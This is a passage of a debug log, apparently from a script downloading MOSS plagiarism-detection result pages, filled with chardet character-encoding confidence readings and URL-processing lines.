0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5269779253411073\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5307566789403784\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match157-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match157-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match164-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match164-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match164-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match163-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match163-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match163-1.html\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5449933600301503\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match165-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match165-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match165-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 36689\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 36676\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 36689\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 36676\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 36676\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 16127\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19203\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 36677\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 16114\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19190\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 16127\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19203\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 36676\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 16114\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 19190\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match166-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match166-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match166-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match167-top.html\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 16114\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 19190\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 16115\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5625865661721603\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 19191\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 16114\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match167-0.html\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19190\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match167-1.html\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.87625\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5512838554397638\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.87625\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5392249343776532\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match169-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match169-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match169-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 16172\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 16159\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 16172\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 16159\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match170-top.html\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 16159\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 16160\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 16159\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5391977486644284\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.505\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.505\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.0\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5607356425475961\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5608145664859282\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match170-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match170-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match168-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match168-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match168-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match177-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match177-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match177-1.html\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 25423\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 24655\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 25410\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 24642\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 25423\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 24655\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 25410\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 24642\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 25410\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 24642\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 25411\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 24643\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 25410\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.546674630352836\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 24642\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match175-top.html\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5428618297264464\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5321814954628881\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match175-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match175-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match176-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match176-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match176-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match173-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match173-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match173-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 31463\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 31450\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 31463\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 31450\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 40599\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 31450\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 40586\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 31451\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 40599\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 31450\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 40586\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 40586\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not 